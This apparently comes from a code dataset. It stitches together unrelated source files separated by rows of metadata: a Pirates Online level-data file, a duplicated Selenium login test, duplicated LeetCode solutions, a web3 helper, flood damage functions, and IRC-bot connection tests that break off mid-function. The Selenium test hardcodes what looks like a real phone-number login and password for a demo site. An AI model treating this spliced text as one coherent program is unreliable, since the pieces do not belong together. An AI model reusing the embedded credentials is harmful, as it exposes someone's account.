model_helper.fit(vloader, epoch=-1, save_step=1000, use_ctc=True)
| 42.364103 | 123 | 0.622806 | 1,059 | 8,261 | 4.543909 | 0.148253 | 0.029925 | 0.027431 | 0.037406 | 0.86783 | 0.863051 | 0.863051 | 0.854946 | 0.854946 | 0.854946 | 0 | 0.045946 | 0.272848 | 8,261 | 194 | 124 | 42.582474 | 0.755119 | 0.047936 | 0 | 0.830986 | 0 | 0 | 0.034969 | 0 | 0 | 0 | 0 | 0.010309 | 0 | 1 | 0.042254 | false | 0 | 0.056338 | 0 | 0.119718 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7771b9af379f2d0d88fadf289ca6e0bf5a6885a8 | 4,438 | py | Python | pirates/leveleditor/worldData/shipQueenAnnesRevenge.py | Willy5s/Pirates-Online-Rewritten | 7434cf98d9b7c837d57c181e5dabd02ddf98acb7 | [
"BSD-3-Clause"
] | 81 | 2018-04-08T18:14:24.000Z | 2022-01-11T07:22:15.000Z | pirates/leveleditor/worldData/shipQueenAnnesRevenge.py | Willy5s/Pirates-Online-Rewritten | 7434cf98d9b7c837d57c181e5dabd02ddf98acb7 | [
"BSD-3-Clause"
] | 4 | 2018-09-13T20:41:22.000Z | 2022-01-08T06:57:00.000Z | pirates/leveleditor/worldData/shipQueenAnnesRevenge.py | Willy5s/Pirates-Online-Rewritten | 7434cf98d9b7c837d57c181e5dabd02ddf98acb7 | [
"BSD-3-Clause"
] | 26 | 2018-05-26T12:49:27.000Z | 2021-09-11T09:11:59.000Z | from pandac.PandaModules import Point3, VBase3, Vec4, Vec3
objectStruct = {'Objects': {'1302550960.6jubutler': {'Type': 'Ship Part','Name': 'shipQueenAnne','Category': "55: Queen Anne's Revenge",'File': '','Flagship': False,'LogoOverride': '-1: Default','Objects': {'1302551043.33jubutler': {'Type': 'Spawn Node','AnimSet': 'default','AuraFX': 'None','Hpr': Point3(0.0, 0.0, 0.0),'Min Population': '1','Patrol Radius': '12.0000','Pause Chance': '100','Pause Duration': '30','Pos': Point3(1.4, -20.734, 25.053),'PoseAnim': '','PoseFrame': '','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Scale': VBase3(1.0, 1.0, 1.0),'Spawnables': 'VoodooZombie T4','Start State': 'Patrol','StartFrame': '0','Team': 'default','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','Visual': {'Color': (0, 0, 0.65, 1),'Model': 'models/misc/smiley'},'spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0},'1302551224.75jubutler': {'Type': 'Movement Node','Hpr': Point3(0.0, 0.0, 0.0),'Pause Chance': 100,'Pause Duration': 30,'Pos': Point3(-11.024, -45.302, 24.596),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.65, 0, 0, 1),'Model': 'models/misc/smiley'}},'1302551245.21jubutler': {'Type': 'Movement Node','Hpr': Point3(0.0, 0.0, 0.0),'Pause Chance': 100,'Pause Duration': 30,'Pos': Point3(7.606, -45.433, 24.594),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.65, 0, 0, 1),'Model': 'models/misc/smiley'}},'1302551263.39jubutler': {'Type': 'Movement Node','Hpr': Point3(0.0, 0.0, 0.0),'Pause Chance': '100','Pause Duration': '30','Pos': Point3(-10.083, 6.624, 25.561),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.65, 0, 0, 1),'Model': 'models/misc/smiley'}},'1302551267.54jubutler': {'Type': 'Movement Node','Hpr': Point3(0.0, 0.0, 0.0),'Pause Chance': '100','Pause Duration': '30','Pos': Point3(10.469, 5.193, 25.707),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.65, 0, 0, 1),'Model': 'models/misc/smiley'}},'1302561022.57jloehrle': {'Type': 'Spawn Node','AnimSet': 'default','AuraFX': 'None','Hpr': VBase3(-177.313, 0.0, 0.0),'Min Population': '1','Patrol Radius': '12.0000','Pause Chance': '100','Pause Duration': '30','Pos': Point3(-1.15, 30.476, 27.427),'PoseAnim': '','PoseFrame': '','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Scale': VBase3(1.0, 1.0, 1.0),'Spawnables': 'VoodooZombie T4','Start State': 'Patrol','StartFrame': '0','Team': 'default','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','Visual': {'Color': (0, 0, 0.65, 1),'Model': 'models/misc/smiley'},'spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0}},'Respawns': True,'StyleOverride': '-1: Default','Team': 'Player','VisSize': '','Visual': {'Model': ['models/shipparts/interceptorL1-geometry_High', 'models/shipparts/interceptorL1-collisions']}}},'Node Links': [['1302551267.54jubutler', '1302551245.21jubutler', 'Bi-directional'], ['1302551267.54jubutler', '1302551263.39jubutler', 'Bi-directional'], ['1302551267.54jubutler', '1302551043.33jubutler', 'Bi-directional'], ['1302551245.21jubutler', '1302551224.75jubutler', 'Bi-directional'], ['1302551245.21jubutler', '1302551043.33jubutler', 'Bi-directional'], ['1302551224.75jubutler', '1302551263.39jubutler', 'Bi-directional'], ['1302551224.75jubutler', '1302551043.33jubutler', 'Bi-directional'], ['1302551263.39jubutler', '1302551043.33jubutler', 'Bi-directional'], ['1302561022.57jloehrle', '1302551263.39jubutler', 'Bi-directional'], ['1302561022.57jloehrle', '1302551267.54jubutler', 'Bi-directional']],'Layers': {},'ObjectIds': {'1302550960.6jubutler': '["Objects"]["1302550960.6jubutler"]','1302551043.33jubutler': '["Objects"]["1302550960.6jubutler"]["Objects"]["1302551043.33jubutler"]','1302551224.75jubutler': '["Objects"]["1302550960.6jubutler"]["Objects"]["1302551224.75jubutler"]','1302551245.21jubutler': '["Objects"]["1302550960.6jubutler"]["Objects"]["1302551245.21jubutler"]','1302551263.39jubutler': '["Objects"]["1302550960.6jubutler"]["Objects"]["1302551263.39jubutler"]','1302551267.54jubutler': '["Objects"]["1302550960.6jubutler"]["Objects"]["1302551267.54jubutler"]','1302561022.57jloehrle': '["Objects"]["1302550960.6jubutler"]["Objects"]["1302561022.57jloehrle"]'}}
extraInfo = {'camPos': Point3(-123.069, -59.1584, 128.29),'camHpr': VBase3(-67.7526, -39.2735, 0),'focalLength': 1.39951908588,'skyState': 2,'fog': 0} | 1,479.333333 | 4,228 | 0.667418 | 557 | 4,438 | 5.315978 | 0.2693 | 0.027018 | 0.024316 | 0.021614 | 0.436339 | 0.436339 | 0.436339 | 0.436339 | 0.406619 | 0.406619 | 0 | 0.210741 | 0.060162 | 4,438 | 3 | 4,229 | 1,479.333333 | 0.499161 | 0 | 0 | 0 | 0 | 0 | 0.614553 | 0.274386 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
77b40f8fba4a27221cb3aa7619e365b709fcc849 | 1,939 | py | Python | text.py | anatolynord/test_python | 2314e7847649277f3dee5db5d4422a6b6586d654 | [
"Apache-2.0"
] | null | null | null | text.py | anatolynord/test_python | 2314e7847649277f3dee5db5d4422a6b6586d654 | [
"Apache-2.0"
] | null | null | null | text.py | anatolynord/test_python | 2314e7847649277f3dee5db5d4422a6b6586d654 | [
"Apache-2.0"
] | null | null | null |
def test_addcomment(self):
self.driver.get("https://coredemo.apdow.net/")
self.driver.set_window_size(2490, 1376)
self.driver.find_element(By.LINK_TEXT, "Sign In").click()
self.driver.find_element(By.NAME, "email").click()
self.driver.find_element(By.NAME, "email").send_keys("79210120011")
self.driver.find_element(By.NAME, "password").send_keys("Anika777")
self.driver.find_element(By.CSS_SELECTOR, ".green").click()
self.driver.find_element(By.LINK_TEXT, "Свежее").click()
self.driver.find_element(By.CSS_SELECTOR, ".ng-tns-c125-12 > .lazyautosizes").click()
self.driver.find_element(By.CSS_SELECTOR, ".ng-invalid").click()
self.driver.find_element(By.CSS_SELECTOR, ".ng-dirty").send_keys("Test_1")
self.driver.find_element(By.CSS_SELECTOR, ".fa-paper-plane > path").click()
self.driver.find_element(By.CSS_SELECTOR, ".ng-tns-c22-3 .ready").click()
self.driver.find_element(By.LINK_TEXT, "Выйти").click()
...
def test_addcomment(self):
self.driver.get("https://coredemo.apdow.net/")
self.driver.set_window_size(2490, 1376)
self.driver.find_element(By.LINK_TEXT, "Sign In").click()
self.driver.find_element(By.NAME, "email").click()
self.driver.find_element(By.NAME, "email").send_keys("79210120011")
self.driver.find_element(By.NAME, "password").send_keys("Anika777")
self.driver.find_element(By.CSS_SELECTOR, ".green").click()
self.driver.find_element(By.LINK_TEXT, "Свежее").click()
self.driver.find_element(By.CSS_SELECTOR, ".ng-tns-c125-12 > .lazyautosizes").click()
self.driver.find_element(By.CSS_SELECTOR, ".ng-invalid").click()
self.driver.find_element(By.CSS_SELECTOR, ".ng-dirty").send_keys("Test_1")
self.driver.find_element(By.CSS_SELECTOR, ".fa-paper-plane > path").click()
self.driver.find_element(By.CSS_SELECTOR, ".ng-tns-c22-3 .ready").click()
self.driver.find_element(By.LINK_TEXT, "Выйти").click()
| 49.717949 | 89 | 0.716864 | 288 | 1,939 | 4.631944 | 0.173611 | 0.209895 | 0.251874 | 0.377811 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0.035449 | 0.097989 | 1,939 | 38 | 90 | 51.026316 | 0.727273 | 0 | 0 | 0.967742 | 0 | 0 | 0.194215 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064516 | false | 0.064516 | 0 | 0 | 0.064516 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 11 |
77de150d02290f4f3b617a6485d67dcd1b4034b1 | 662 | py | Python | leet/array/findBuildings.py | monishshah18/python-cp-cheatsheet | a5514b08816959de1198156f7764c54a7a585f20 | [
"Apache-2.0"
] | null | null | null | leet/array/findBuildings.py | monishshah18/python-cp-cheatsheet | a5514b08816959de1198156f7764c54a7a585f20 | [
"Apache-2.0"
] | null | null | null | leet/array/findBuildings.py | monishshah18/python-cp-cheatsheet | a5514b08816959de1198156f7764c54a7a585f20 | [
"Apache-2.0"
] | 1 | 2021-09-22T04:41:47.000Z | 2021-09-22T04:41:47.000Z | class Solution:
def findBuildings(self, heights: List[int]) -> List[int]:
rtn = deque()
maxHeight = float('-inf')
for i in range(len(heights)-1, -1, -1):
if heights[i] > maxHeight:
maxHeight = heights[i]
rtn.appendleft(i)
return rtn
class Solution:
def findBuildings(self, heights : List[int]) -> List[int]:
rtn = deque()
maxHeight = 0
for i in range(len(heights)-1,-1,-1):
if heights[i] > maxHeight:
maxHeight = heights[i]
rtn.appendleft(i)
return rtn
| 27.583333 | 62 | 0.478852 | 71 | 662 | 4.464789 | 0.323944 | 0.088328 | 0.100946 | 0.182965 | 0.971609 | 0.971609 | 0.971609 | 0.971609 | 0.971609 | 0.971609 | 0 | 0.017767 | 0.404834 | 662 | 24 | 63 | 27.583333 | 0.786802 | 0 | 0 | 0.888889 | 0 | 0 | 0.006033 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7ad19c30d14f423e29b714fc9295765572637b54 | 194 | py | Python | origin-bridge/tests/helpers/eth_utils.py | rgm93/CleanersDApp | 6af29884110023b29056e1c4126cc021ed5947cc | [
"MIT"
] | 10 | 2018-03-22T22:13:26.000Z | 2018-05-29T06:29:17.000Z | origin-bridge/tests/helpers/eth_utils.py | rgm93/CleanersDApp | 6af29884110023b29056e1c4126cc021ed5947cc | [
"MIT"
] | 64 | 2018-03-30T02:20:11.000Z | 2018-06-22T01:21:41.000Z | origin-bridge/tests/helpers/eth_utils.py | rgm93/CleanersDApp | 6af29884110023b29056e1c4126cc021ed5947cc | [
"MIT"
] | 5 | 2018-07-08T01:56:41.000Z | 2018-09-29T15:01:29.000Z | from web3 import Web3
sample_eth_address = 562046206989085878832492993516240920558397288279
def str_eth(numeric_eth_address):
return Web3.toChecksumAddress(hex(int(numeric_eth_address)))
| 24.25 | 69 | 0.850515 | 22 | 194 | 7.181818 | 0.636364 | 0.189873 | 0.21519 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.289773 | 0.092784 | 194 | 7 | 70 | 27.714286 | 0.607955 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
24809a1b2571bb16267583310a862fb622f2398c | 43 | py | Python | challenges/up_and_down.py | P-py/Solving-PythonPrinciples | 6dd805e258794422483af5aaf1a3745bf6a00e8d | [
"MIT"
] | null | null | null | challenges/up_and_down.py | P-py/Solving-PythonPrinciples | 6dd805e258794422483af5aaf1a3745bf6a00e8d | [
"MIT"
] | null | null | null | challenges/up_and_down.py | P-py/Solving-PythonPrinciples | 6dd805e258794422483af5aaf1a3745bf6a00e8d | [
"MIT"
] | null | null | null | def up_down(num):
return (num-1, num+1) | 21.5 | 25 | 0.627907 | 9 | 43 | 2.888889 | 0.666667 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057143 | 0.186047 | 43 | 2 | 25 | 21.5 | 0.685714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
7087697cd76b58e855312e0907298d726a551e72 | 78 | py | Python | Python/Math/integers_come_in_all_sizes.py | rho2/HackerRank | 4d9cdfcabeb20212db308d8e4f2ac1b8ebf7d266 | [
"MIT"
] | null | null | null | Python/Math/integers_come_in_all_sizes.py | rho2/HackerRank | 4d9cdfcabeb20212db308d8e4f2ac1b8ebf7d266 | [
"MIT"
] | null | null | null | Python/Math/integers_come_in_all_sizes.py | rho2/HackerRank | 4d9cdfcabeb20212db308d8e4f2ac1b8ebf7d266 | [
"MIT"
] | null | null | null | print int(raw_input())**int(raw_input()) + int(raw_input())**int(raw_input()) | 78 | 78 | 0.679487 | 13 | 78 | 3.769231 | 0.307692 | 0.489796 | 0.897959 | 0.857143 | 0.897959 | 0.897959 | 0.897959 | 0.897959 | 0.897959 | 0 | 0 | 0 | 0.051282 | 78 | 1 | 78 | 78 | 0.662162 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 12 |
5610e9d27ba2a2308714a052b9543ce1b06a086f | 1,412 | py | Python | damagefunctions/damagefunctions.py | Pranavesh-Panakkal/damagefunctions | d8d701d401e3ddef46c216f981c5a5a4fd9c4679 | [
"MIT"
] | null | null | null | damagefunctions/damagefunctions.py | Pranavesh-Panakkal/damagefunctions | d8d701d401e3ddef46c216f981c5a5a4fd9c4679 | [
"MIT"
] | null | null | null | damagefunctions/damagefunctions.py | Pranavesh-Panakkal/damagefunctions | d8d701d401e3ddef46c216f981c5a5a4fd9c4679 | [
"MIT"
] | null | null | null |
class damagefunctions:
def pistrika_US_2010_block_group(water_depth_m, velocity_ms):
"""Damage fraction [0-1] from water depth (m) and flow velocity (m/s) using Pistrika and Jonkman (2010) results for block group
Parameters
----------
water_depth_m : float, (default : None)
Water depth in meters
velocity_ms : float, (default : None)
Flow velocity in m/s
Returns
-------
Damage ratio between 0 and 1.
References
----------
* (Pristrika and Jonkman (2010))[https://link.springer.com/article/10.1007/s11069-009-9476-y]
"""
return 0.422+0.075*water_depth_m*velocity_ms**0.682
def pistrika_US_2010_block(water_depth_m, velocity_ms):
"""Damage fraction [0-1] from water depth (m) and flow velocity (m/s) using Pistrika and Jonkman (2010) results for block
Parameters
----------
water_depth_m : float, (default : None)
Water depth in meters
velocity_ms : float, (default : None)
Flow velocity in m/s
Returns
-------
Damage ratio between 0 and 1.
References
----------
* (Pristrika and Jonkman (2010))[https://link.springer.com/article/10.1007/s11069-009-9476-y]
"""
return 0.457+0.063*water_depth_m*velocity_ms**0.654 | 40.342857 | 136 | 0.575779 | 178 | 1,412 | 4.426966 | 0.303371 | 0.126904 | 0.111675 | 0.096447 | 0.936548 | 0.880711 | 0.824873 | 0.824873 | 0.824873 | 0.824873 | 0 | 0.093306 | 0.3017 | 1,412 | 35 | 137 | 40.342857 | 0.705882 | 0.615439 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
561e01b79aa7797775b3f742c2772e0af8591677 | 42,647 | py | Python | hallo/test/modules/server_control/test_connect_irc.py | joshcoales/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 1 | 2018-05-19T22:27:20.000Z | 2018-05-19T22:27:20.000Z | hallo/test/modules/server_control/test_connect_irc.py | joshcoales/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 75 | 2015-09-26T18:07:18.000Z | 2022-01-04T07:15:11.000Z | hallo/test/modules/server_control/test_connect_irc.py | SpangleLabs/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 1 | 2021-04-10T12:02:47.000Z | 2021-04-10T12:02:47.000Z | import threading
from hallo.events import EventMessage
from hallo.server import Server
from hallo.server_irc import ServerIRC
from hallo.user_group import UserGroup
def test_connect_specify_irc(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response is given
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
def test_port_in_url(hallo_getter):
test_hallo = hallo_getter({"server_control"})
test_port = 80
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:" + str(test_port),
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.get_server_port() == test_port, "Port incorrect"
def test_port_by_argument(hallo_getter):
test_hallo = hallo_getter({"server_control"})
test_port = 80
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com server_port=" + str(test_port),
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.get_server_port() == test_port, "Port incorrect"
def test_address_in_argument(hallo_getter):
test_hallo = hallo_getter({"server_control"})
test_url = "www.example.com"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc " + test_url + " server_port=80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance"
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.server_address == test_url, "Address incorrect"
def test_address_by_argument(hallo_getter):
test_hallo = hallo_getter({"server_control"})
test_url = "www.example.com"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc server_address=" + test_url + " server_port=80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance"
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.server_address == test_url, "Address incorrect"
def test_inherit_port(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set things up
test_port = 80
test_serv_irc = ServerIRC(test_hallo)
test_serv_irc.prefix = ""
test_serv_irc.name = "test_serv_irc"
test_serv_irc.server_port = test_port
test_chan_irc = test_serv_irc.get_channel_by_address(
"test_chan".lower(), "test_chan"
)
test_user_irc = test_serv_irc.get_user_by_address(
"test_user".lower(), "test_user"
)
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_serv_irc, test_chan_irc, test_user_irc, "connect irc example.com"
)
)
# Can't check response because I'm using a ServerIRC instead of a ServerMock
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance"
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.server_port == test_port, "Port incorrect"
def test_non_int_port_failure(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc example.com server_port=abc",
)
)
# Check response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" in data[0].text.lower(), "Connect didn't respond with an error."
assert "invalid port" in data[0].text.lower(), (
"Connect returned the wrong error (" + str(data[0].text) + ")"
)
def test_null_address(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "connect irc")
)
# Check response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" in data[0].text.lower(), "Connect didn't respond with an error."
assert "no server address" in data[0].text.lower(), (
"Connect returned the wrong error (" + str(data[0].text) + ")"
)
def test_specified_server_name(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Test vars
test_name = "test_server"
test_server = "www.example.com"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc "
+ test_server
+ " server_port=80 server_name="
+ test_name,
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.server_address == test_server, "Address incorrect"
assert right_server.name == test_name, "Name incorrect"
def test_get_server_name_from_domain(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Test vars
test_name = "example"
test_server = "www." + test_name + ".com"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc " + test_server + " server_port=80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.server_address == test_server, "Address incorrect"
assert right_server.name == test_name, "Name incorrect"
def test_auto_connect_default(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.auto_connect, "Auto connect didn't default to true"
def test_auto_connect_true(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 auto_connect=true",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.auto_connect, "Auto connect didn't set to true"
def test_auto_connect_false(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 auto_connect=false",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert not right_server.auto_connect, "Auto connect didn't set to false"
def test_server_nick_inherit(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_nick = "test_hallo"
test_hallo.test_server.nick = test_nick
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.nick == test_nick, "Nick did not inherit from other server"
def test_server_nick_specified(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_nick = "test_hallo2"
# Run command
